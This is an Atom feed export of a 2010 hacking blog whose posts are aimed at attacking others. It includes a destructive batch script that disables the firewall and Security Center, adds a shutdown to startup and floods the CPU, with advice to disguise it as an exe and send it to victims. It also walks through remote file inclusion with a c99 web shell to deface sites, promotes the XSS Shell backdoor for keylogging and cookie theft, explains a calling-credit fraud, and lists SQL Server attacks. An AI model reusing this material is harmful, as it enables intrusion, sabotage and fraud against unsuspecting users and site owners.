<?xml version="1.0" encoding="UTF-8" standalone="no"?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:gd="http://schemas.google.com/g/2005" xmlns:georss="http://www.georss.org/georss" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:thr="http://purl.org/syndication/thread/1.0"><id>tag:blogger.com,1999:blog-4293538220121388026</id><updated>2024-11-01T16:07:01.050+05:30</updated><category term="Hacking"/><category term="Tricks"/><category term="Earn"/><category term="Tools"/><category term="PHP"/><category term="Blogger"/><category term="Google"/><category term="Orkut"/><title type="text">i-Xploit</title><subtitle type="html">All about hacks and exploits, hacking tools, earning tricks, blogger tricks, orkut tricks, and many more...</subtitle><link href="http://i-xploit.blogspot.com/feeds/posts/default" rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default?redirect=false" rel="self" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/" rel="alternate" type="text/html"/><link href="http://pubsubhubbub.appspot.com/" rel="hub"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default?start-index=26&amp;max-results=25&amp;redirect=false" rel="next" type="application/atom+xml"/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image height="16" rel="http://schemas.google.com/g/2005#thumbnail" src="https://img1.blogblog.com/img/b16-rounded.gif" width="16"/></author><generator uri="http://www.blogger.com" version="7.00">Blogger</generator><openSearch:totalResults>38</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><xhtml:meta content="noindex" name="robots" xmlns:xhtml="http://www.w3.org/1999/xhtml"/><entry><id>tag:blogger.com,1999:blog-4293538220121388026.post-3241637005651976140</id><published>2010-09-28T13:50:00.000+05:30</published><updated>2010-09-28T13:50:27.709+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Tricks"/><title type="text">Make Free Calls Worldwide</title><content type="html">First go to:&lt;br /&gt;
&lt;a href="http://9.bb/d3" onclick="" target="_blank"&gt;INSTALL&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
After  it is fully installed, open friend caller from desktop. Then register.&lt;br /&gt;
&lt;br /&gt;
&lt;img src="http://images.orkut.com/orkut/photos/OgAAAAVMH0TYu_VXYJFx59AwTW5P3nHtWeT9M1wGhhcmFqgL4uDrx3qXibZpW5pWe6GLXiTXcRA3W14QFpuAGLoy0KoAm1T1UNZSiT-ncz68syHEwMQb1o2si_h-.jpg" /&gt;&lt;br /&gt;
-&lt;br /&gt;
&lt;img src="http://images.orkut.com/orkut/photos/OgAAAEyyr4YkSB4UHEQH7fvFk0J1gl372pGn-_862YHszf_KCp0_w7GZJPXwDfu-v_cvH_EffcDlkZ7n00NE1XJNV8cAm1T1UFn8C2wlop__ra34en-vNpWvRJTS.jpg" /&gt;&lt;br /&gt;
&lt;br /&gt;
Better  to you temp mails like mailinator,eyepaste,yopmail etc ;)&lt;br /&gt;
&lt;br /&gt;
Now go  to your email and confirm your account and you will be credited $ 0.10  for free calls. So you can only call for 10 seconds for free but this  what I made this tut so you can call free.&lt;br /&gt;
&lt;br /&gt;
Now login.&lt;br /&gt;
&lt;br /&gt;
&lt;img src="http://images.orkut.com/orkut/photos/OgAAAH165DEze9OooOeritk12M9b15lSupcRD870fMD70Ad7NPi7EJ5gCTvqCjRlP_xEL1KUm63oVQ9OefFXQR52TZMAm1T1UK48ak0QXHhIB2Dz3AovOucEnl2v.jpg" /&gt;&lt;br /&gt;
&lt;br /&gt;
Then  click on phone Icon.&lt;br /&gt;
&lt;br /&gt;
&lt;img src="http://images.orkut.com/orkut/photos/OgAAANIPFse-0jDmtmJyIsjtErzGOxYilHu3IUMNIMwREekKNpRmQ40BSrjscKPqh2ri5X2vvQCwMBNdGFFyUgKVhH4Am1T1UOj8bZtwH4xCNoeaZkzODiyegCQy.jpg" /&gt;&lt;br /&gt;
&lt;br /&gt;
Now open cheat engine. [ Download it from &lt;a href="http://u.bb/QK" onclick="" target="_blank"&gt;http://u.bb/QK&lt;/a&gt;]&lt;br /&gt;
&lt;br /&gt;
Now  click on open process.&lt;br /&gt;
&lt;br /&gt;
&lt;img height="295" src="http://images.orkut.com/orkut/photos/OQAAABbzz1QHhj5NpJP3ma3D-Y2zE41Z8pkSRTwXS3epxXo7J819AMEZKng9nGhnu8DYJwBN9N14_icXzkd83NIMfqMAm1T1UMUKuAUZBarHUAK_PAsg2IAKeJcu.jpg" width="400" /&gt;&lt;br /&gt;
&lt;br /&gt;
Then  click on window list.&lt;br /&gt;
&lt;br /&gt;
&lt;img height="294" src="http://images.orkut.com/orkut/photos/OgAAAE47agAd-nUyqufleV6LXaPnzhGgJtoCgdLeh6Al5qW5eYtEGkQ5tsfR4uZv_ot78RMUmDmfcYBSZzd-TrDR6j4Am1T1UDETj36EJ48WKWqfvpzRK35XHT41.jpg" width="400" /&gt;&lt;br /&gt;
&lt;br /&gt;
Then  select friend caller. And open it.&lt;br /&gt;
&lt;br /&gt;
&lt;img height="295" src="http://images.orkut.com/orkut/photos/OgAAAN1TJ4zhT1CCC260qgiyxXk76RUSfmKZktztJIdbVvWBU_sil__dsrrU_S8gKx7JWP9d88XiEUzG-dtxQlnCNzEAm1T1UCYaIysU7VUkdQKOIGERXHUatYy4.jpg" width="400" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Now  dial number in friend caller. [First test your own number] and click  call.&lt;br /&gt;
&lt;br /&gt;
&lt;img src="http://images.orkut.com/orkut/photos/OgAAALe3n7UOC1cyqDyPle7HPauY8kHCEs5p_mVIucHqxiKu19sjqhMt6tB-uh2XWWVKKcyKD21TC6Avzl1u8fLnjIoAm1T1UL0jrs-4yzhBpwnx3xzV4ZMLhSbS.jpg" /&gt;&lt;br /&gt;
&lt;br /&gt;
Now  it will start ringing:.&lt;br /&gt;
&lt;br /&gt;
&lt;img src="http://images.orkut.com/orkut/photos/OgAAAOs2qfJIieooRQNhWSsMLC7NM65EijnG17Hk1a4w4CrvKkoSqxsjXcH4zE4c4rQIllm06062Nv5BDI4lawa579UAm1T1UH9p5W3xX78u1ftsBpoZEU4GZfKk.jpg" /&gt;&lt;br /&gt;
&lt;br /&gt;
Now  in cheat engine, enable speed hack. Edit speed to &lt;b&gt;0.00&lt;/b&gt;&lt;img height="294" src="http://images.orkut.com/orkut/photos/OgAAAG6CRwtCYiKLEajYU6XIlI4u3sXDacHo3dXZn_ka9MZg8uEmCApVOKs7DUfqiFjevCkGHJMxeETzPMmyJshtNcEAm1T1UGDYNwrOZcAxInwHLbBjUb4oVj8i.jpg" width="400" /&gt;&lt;br /&gt;
&lt;br /&gt;
If you have any query, comment below.</content><link href="http://i-xploit.blogspot.com/feeds/3241637005651976140/comments/default" rel="replies" title="Post Comments" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/09/make-free-calls-worldwide.html#comment-form" rel="replies" title="0 Comments" type="text/html"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/3241637005651976140" rel="edit" type="application/atom+xml"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/3241637005651976140" rel="self" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/09/make-free-calls-worldwide.html" rel="alternate" title="Make Free Calls Worldwide" type="text/html"/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image height="16" rel="http://schemas.google.com/g/2005#thumbnail" src="https://img1.blogblog.com/img/b16-rounded.gif" width="16"/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4293538220121388026.post-6134073557546012249</id><published>2010-09-10T17:35:00.000+05:30</published><updated>2010-09-10T17:35:25.738+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><title type="text">Create Undetectable Batch File</title><content type="html">Hello,this is a tutorial showing you how to make a batch file undetectable.&lt;br /&gt;
First,if you want to make your way thru the computer and not be seen or something,easiest way is to shutdown all firewalls/security.&lt;br /&gt;
To do that you have to type in the following inside Notepad:&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote&gt;Code:&lt;br /&gt;
@echo off&lt;br /&gt;
net stop “Security Center”&lt;br /&gt;
net stop SharedAccess&lt;br /&gt;
netsh firewall set opmode mode=disable&lt;/blockquote&gt;&lt;br /&gt;
hat will stop the Security Center&lt;br /&gt;
Shared Access and Firewall.&lt;br /&gt;
&lt;br /&gt;
Save the file as something.bat&lt;br /&gt;
&lt;br /&gt;
But this will probably fail because when the AV detects that it is a batch file it will automatically delete it.&lt;br /&gt;
So What to do?&lt;br /&gt;
&lt;br /&gt;
Exe:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Download nBinder Pro:&lt;/b&gt;&lt;br /&gt;
http://www.midload.com/en/file/29192/nbinder-rar&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;mirror&lt;/b&gt;&lt;br /&gt;
http://rapidshare.com/files/109795148/nbinder.rar&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;&lt;b&gt;pass: linkzshare.net&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
NBinder pro is a Binder/Converter/Icon Changer&lt;br /&gt;
&lt;br /&gt;
Download,and open.&lt;br /&gt;
Click Add..&lt;br /&gt;
And add the batch file.&lt;br /&gt;
Then you can bind it with self.&lt;br /&gt;
By simply clicking Bind.&lt;br /&gt;
That will convert the batch to .exe&lt;br /&gt;
And then you change the icon.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Com:&lt;br /&gt;
Download:&lt;br /&gt;
Bat2COM&lt;br /&gt;
And convert it.&lt;br /&gt;
&lt;br /&gt;
When it is converted,send it to someone,and when he runs it he will see nothing,but a cmd window open and close.&lt;br /&gt;
But what he doesn't see is that his firewall,security has closed.&lt;br /&gt;
&lt;br /&gt;
Now,to make the batch a little more dangerous.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote&gt;Code:&lt;br /&gt;
@echo off&lt;br /&gt;
net stop “Security Center”&lt;br /&gt;
net stop SharedAccess&lt;br /&gt;
netsh firewall set opmode mode=disable&lt;br /&gt;
echo shutdown -s &amp;gt;&amp;gt; "%systemdrive%\documents and settings\start menu\programs\startup\virus.bat"&lt;br /&gt;
:virus&lt;br /&gt;
start cmd.exe&lt;br /&gt;
start command.com&lt;br /&gt;
start mspaint.exe&lt;br /&gt;
goto :virus&lt;/blockquote&gt;&lt;br /&gt;
So basically shuts down all security.&lt;br /&gt;
Makes a new batch file at startup which inside is the command shutdown -s&lt;br /&gt;
Then starts cmd.exe command.com and mspaint.exe multiple,multiple times.&lt;br /&gt;
Watch the CPU usage go up.</content><link href="http://i-xploit.blogspot.com/feeds/6134073557546012249/comments/default" rel="replies" title="Post Comments" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/09/create-undetectable-batch-file.html#comment-form" rel="replies" title="0 Comments" type="text/html"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/6134073557546012249" rel="edit" type="application/atom+xml"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/6134073557546012249" rel="self" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/09/create-undetectable-batch-file.html" rel="alternate" title="Create Undetectable Batch File" type="text/html"/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image height="16" rel="http://schemas.google.com/g/2005#thumbnail" src="https://img1.blogblog.com/img/b16-rounded.gif" width="16"/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4293538220121388026.post-5322279110946481691</id><published>2010-08-29T17:05:00.001+05:30</published><updated>2010-08-29T17:07:29.936+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><title type="text">Hack websites using Remote file inlcusion</title><content type="html">I receive many E-mails on How To Hack websites so,  &amp;nbsp;today I will demonstrate how hackers use remote file inlcusion to  deface websites.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Requirements&lt;/b&gt;&lt;br /&gt;
C99 shell&lt;br /&gt;
&lt;br /&gt;
First of all visit google and type   &lt;br /&gt;
&lt;span style="color: red;"&gt;"index.php?page="&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
This will show all the pages which have index.php?page=" in their url,    RFI vulnerabilities only work on those sites which have &lt;span style="color: red;"&gt;index.php?page=&lt;/span&gt;    in their url. &lt;br /&gt;
&lt;br /&gt;
Now lets say that the website is as follows: &lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.targetsite.com%2findex.php%3fpage%3dsomething/" target="_blank"&gt;www.targetsite.com/index.php?page=something&lt;/a&gt;  &lt;br /&gt;
&lt;br /&gt;
so to check the vulnerability we will replace the something to  Google   or any other site now if Google homepage  shows up this means that the   website is vulnerable to the attack.The  url will look like&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitPa6Qu9dd68_gVLm0qdh478oPow9-DXRySkVLAUn7cS39SIMGFallJOY2Ie7-GoxV6ePMOuCBSesDom4xoCzhPgPKiyPPpruN-meEKhpk-kAz5yx_6Zv7DmUEXZt19rPnJ6RlY6j1j-Y/s640/By+Hackguide4u.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitPa6Qu9dd68_gVLm0qdh478oPow9-DXRySkVLAUn7cS39SIMGFallJOY2Ie7-GoxV6ePMOuCBSesDom4xoCzhPgPKiyPPpruN-meEKhpk-kAz5yx_6Zv7DmUEXZt19rPnJ6RlY6j1j-Y/s400/By+Hackguide4u.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&amp;nbsp;&lt;a href="http://www.pakhaxors.com/redirect-to/?redirect=http%3A%2F%2Fwww.targetsite.com%2Findex.php%3Fpage%3Dwww.google.com" target="_blank"&gt;www.targetsite.com/index.php?page=www.google.com&lt;/a&gt;   &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Once  we know that the website is vulnerable to the attack we will  now   include the c99 shell.To do it download the c99 shell and then  upload it   to a webhosting site such as &lt;a href="http://www.ripway.com/" target="_blank"&gt;Ripway.com&lt;/a&gt; or &lt;a href="http://www.110mb.com/" target="_blank"&gt;110mb.com&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Once the shell is uploaded you will have a unique url for your shell  lets say it is  &lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.webhostingsite.com%2fc99.txt/" target="_blank"&gt;www.webhostingsite.com/c99.txt&lt;/a&gt;  &lt;br /&gt;
&lt;br /&gt;
Now to execute the shell in order to gain access to the website we will  do as follows &lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.targetsite.com%2findex.php%3fpage%3dwww.webhostingsite.com%2fc99.txt%3f/" target="_blank"&gt;http://www.targetsite.com%2Findex.php%3Fpage%3Dwww.webhostingsite.com%2Fc99.txt%3F&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Dont forgett the "?" or else it wont be executed. &lt;br /&gt;
&lt;br /&gt;
Remeber this does not work on all websites so the key is to try and try  and try and try!</content><link href="http://i-xploit.blogspot.com/feeds/5322279110946481691/comments/default" rel="replies" title="Post Comments" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/08/hack-websites-using-remote-file.html#comment-form" rel="replies" title="0 Comments" type="text/html"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/5322279110946481691" rel="edit" type="application/atom+xml"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/5322279110946481691" rel="self" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/08/hack-websites-using-remote-file.html" rel="alternate" title="Hack websites using Remote file inlcusion" type="text/html"/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image height="16" rel="http://schemas.google.com/g/2005#thumbnail" src="https://img1.blogblog.com/img/b16-rounded.gif" width="16"/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitPa6Qu9dd68_gVLm0qdh478oPow9-DXRySkVLAUn7cS39SIMGFallJOY2Ie7-GoxV6ePMOuCBSesDom4xoCzhPgPKiyPPpruN-meEKhpk-kAz5yx_6Zv7DmUEXZt19rPnJ6RlY6j1j-Y/s72-c/By+Hackguide4u.PNG" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4293538220121388026.post-1238430473314936006</id><published>2010-04-02T17:41:00.000+05:30</published><updated>2010-04-02T17:41:39.232+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Tools"/><title type="text">XSS Shell v0.3.9 – Cross Site Scripting Backdoor Tool</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;
XSS Shell is a powerful XSS backdoor which allows interactively getting control over a Cross-site Scripting (XSS) vulnerability in a web application. Demonstrates the real power and damage of Cross-site Scripting attacks.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;strong&gt;WHAT IS XSS SHELL ?&lt;/strong&gt;&lt;br /&gt;
XSS Shell is powerful a XSS backdoor and zombie manager. This concept first presented by XSS-Proxy (http://xss-proxy.sourceforge.net/). Normally in XSS attacks attacker has one shot, in XSS Shell you can interactively send requests and get responses from victim, you can backdoor the page.&lt;br /&gt;
You can steal basic auth, you can bypass IP restrictions in administration panels, you can DDoS some systems with a permanent XSS vulnerability etc. Attack possibilities are limited with ideas. Basically this tool demonstrates that you can do more with XSS.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;FEATURES&lt;/strong&gt;&lt;br /&gt;
XSS Shell has several features to gain whole access over victim. Also you can simply add your own commands.&lt;br /&gt;
Most of the features can enable or disabled from configuration or can be tweaked from source code.&lt;br /&gt;
Features:&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Regenerating Pages&lt;/li&gt;
&lt;li&gt;Keylogger&lt;/li&gt;
&lt;li&gt;Mouse Logger (click points + current DOM)&lt;/li&gt;
&lt;/ul&gt;&lt;b&gt;Built-in Commands: &lt;/b&gt;&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Get Keylogger Data&lt;/li&gt;
&lt;li&gt;Get Current Page (Current rendered DOM / like screenshot)&lt;/li&gt;
&lt;li&gt;Get Cookie&lt;/li&gt;
&lt;li&gt;Execute supplied javaScript (eval)&lt;/li&gt;
&lt;li&gt;Get Clipboard (IE only)&lt;/li&gt;
&lt;li&gt;Get internal IP address (Firefox + JVM only)&lt;/li&gt;
&lt;li&gt;Check victim’s visited URL history&lt;/li&gt;
&lt;li&gt;DDoS&lt;/li&gt;
&lt;li&gt;Force to Crash victim’s browser&lt;/li&gt;
&lt;/ul&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;&amp;nbsp;Install Admin Interface;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
1. Copy "xssshell" folder into your web server&lt;br /&gt;
2. Copy "db" to a secure place (below root)&lt;br /&gt;
3. Configure "database path" from "xssshell/db.asp"&lt;br /&gt;
4. Modify hard coded password in db.asp [default password is : w00t]&lt;br /&gt;
5. Now you can access admin interface from something like http://[YOURHOST]/xssshell/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Configure XSS Shell for communication;&lt;/b&gt;&lt;br /&gt;
1. Open xssshell.asp&lt;br /&gt;
2. Set "SERVER" variable to where your XSSShell folder is located. i.e: "http://[YOURHOST]/xssshell/";&lt;br /&gt;
3. Be sure to check "ME", "CONNECTOR", "COMMANDS_URL" variables. If you changed filenames, folder names or some kind of different configuration you need modify them.&lt;br /&gt;
&lt;br /&gt;
Now open your admin interface from your browser,&lt;br /&gt;
To test it, just modify "sample_victim/default.asp" source code and replace "http://attacker:81/release/xssshell.js" URL with your own XSS Shell URL. Open "sample_victim" folder in some other browser and may be upload in to some other server.&lt;br /&gt;
&lt;br /&gt;
Now you should see a zombie in admin interface. Just write something into "parameters" textarea and click "alert()". You should see an alert message in victim's browser. &lt;br /&gt;
&lt;br /&gt;
-------------------------&lt;br /&gt;
SECURITY NOTES&lt;br /&gt;
-------------------------&lt;br /&gt;
- As a hunter be careful about possible "Backfire" in getSelfHTML(). Someone can hack you back or track you by another XSS or XSS Shell attack.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;- Checkout "showdata.asp" and implement your own "filter()" function to make it safer for you.&lt;br /&gt;
&lt;br /&gt;
- Put "On error resume next" to db.asp, better modify your web server to not show any error.&lt;br /&gt;
&lt;br /&gt;
-------------------------&lt;br /&gt;
HOW CAN YOU EXTEND?&lt;br /&gt;
-------------------------&lt;br /&gt;
First implement it to xssshell.asp&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;1) Add new enum for your control&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;- Set a name and unique number like "CMD_GETCOOKIE"&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;- var CMD_SAMPLE = 78;&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;- Set datatype for your response (generally TEXT), &lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;- dataTypes[CMD_SAMPLE] = TEXT;&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;2) Write your function and add it to page&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;- function cmdSample(){return "yeah working !"}&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;3) Call it&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;- Go inside to "function processGivenCommand(cmd)"&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;- Add a new case like "case CMD_SAMPLE:"&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;4) Report it back&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;- Inside the case call log;&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;"log(cmdSample(), dataTypes[cmd.cmd], cmd.attackID, "waitAndRun()");"&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Secondly Implement it to admin interface;&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;- In db.asp just add a new element to "Commands" array (command name, command unique number, description). &lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;i.e. "cmdSample()",78,"Command sample ! Just returns a message"&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
There are parameters and lots of helper in the code. Check out other commands for reference. &lt;br /&gt;
Enable debug feature to debug your new commands easily.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
-------------------------&lt;br /&gt;
KNOWN BUGS;&lt;br /&gt;
-------------------------&lt;br /&gt;
- Keylogger is not working on IE&lt;br /&gt;
- Possibly not going to work for framed pages because of frame regeneration.&lt;br /&gt;
- Not working on Konqueror&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;DOWNLOAD: &lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;a class="normal12blue" href="http://www.ziddu.com/download/9267912/XSSShell039.zip.html"&gt;&lt;b&gt;http://www.ziddu.com/download/9267912/XSSShell039.zip.html&lt;/b&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div id="ui-datepicker-div" style="display: none;"&gt;&lt;/div&gt;</content><link href="http://i-xploit.blogspot.com/feeds/1238430473314936006/comments/default" rel="replies" title="Post Comments" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/04/xss-shell-v039-cross-site-scripting.html#comment-form" rel="replies" title="0 Comments" type="text/html"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/1238430473314936006" rel="edit" type="application/atom+xml"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/1238430473314936006" rel="self" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/04/xss-shell-v039-cross-site-scripting.html" rel="alternate" title="XSS Shell v0.3.9 – Cross Site Scripting Backdoor Tool" type="text/html"/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image height="16" rel="http://schemas.google.com/g/2005#thumbnail" src="https://img1.blogblog.com/img/b16-rounded.gif" width="16"/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4293538220121388026.post-8263202014932625501</id><published>2010-04-02T17:25:00.001+05:30</published><updated>2010-04-02T17:26:03.874+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><title type="text">10 Tricks to Xploit SQL Sites</title><content type="html">&lt;div class="separator" style="clear: both; color: white; text-align: center;"&gt;&lt;a href="http://www.thetechherald.com/media/images/200817/SQLInjection1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="266" src="http://www.thetechherald.com/media/images/200817/SQLInjection1.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="msg" id="post_message_49528" style="color: white;"&gt;&lt;/div&gt;&lt;div class="msg" id="post_message_49528" style="color: white;"&gt;&lt;/div&gt;&lt;div class="msg" id="post_message_49528" style="color: white;"&gt;&lt;/div&gt;&lt;div class="msg" id="post_message_49528" style="color: white;"&gt;Whether it is through manual poking and prodding or the use of securitytools, malicious attackers employ a variety of tricks to break into SQL server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server.testing&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;b&gt;1. Direct connections via the Internet&lt;/b&gt;&lt;br /&gt;
These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield?s Port Report shows just how many systems are sitting out there waiting to be attacked. I don?t understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;2. Vulnerability scanning&lt;/b&gt;&lt;br /&gt;
Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or thedatabase system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assesment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.?s NGSSquirrel for SQL Server (for database-specific scanning). They?re easy to use, offer the most comprehensive assessment and, in turn, provide the best results. Figure 1 shows some SQL injection vulnerabilities you may be able to uncover.&lt;br /&gt;
&lt;a href="http://i48.tinypic.com/sxkr5i.jpg" target="_blank"&gt;&lt;img alt="" border="0" src="http://i48.tinypic.com/sxkr5i.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;
Figure 1: Common SQL injection vulnerabilities found using WebInspect.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;3. Enumerating the SQL Server Resolution Service&lt;/b&gt;&lt;br /&gt;
Running on UDP port 1434, this allows you to find hidden database system. Chip Andrews? SQLPing v 2.5 is a great tool to use to look for SQL server system(s) and determine version numbers (somewhat). This works even if your SQL Server instances aren?t listening on the default ports. Also, a buffer overflow can occur when an overly long request for SQL Servers is sent to the broadcast address for UDP port 1434.  instances and probe deeper into the[/COLOR]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;4. Cracking SA passwords&lt;/b&gt;&lt;br /&gt;
Deciphering SA passwords is also used by attackers to get into SQL Server databases. Unfortunately, in many cases, no cracking is needed since no password has been assigned (Oh, logic, where art thou?!). Yet another use for the handy-dandy SQLPing tool mentioned earlier. The commercial products AppDetective from Application Security Inc. and NGSSQLCrack from NGS software Ltd. also have this capability.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;5. Direct-exploit attacks&lt;/b&gt;&lt;br /&gt;
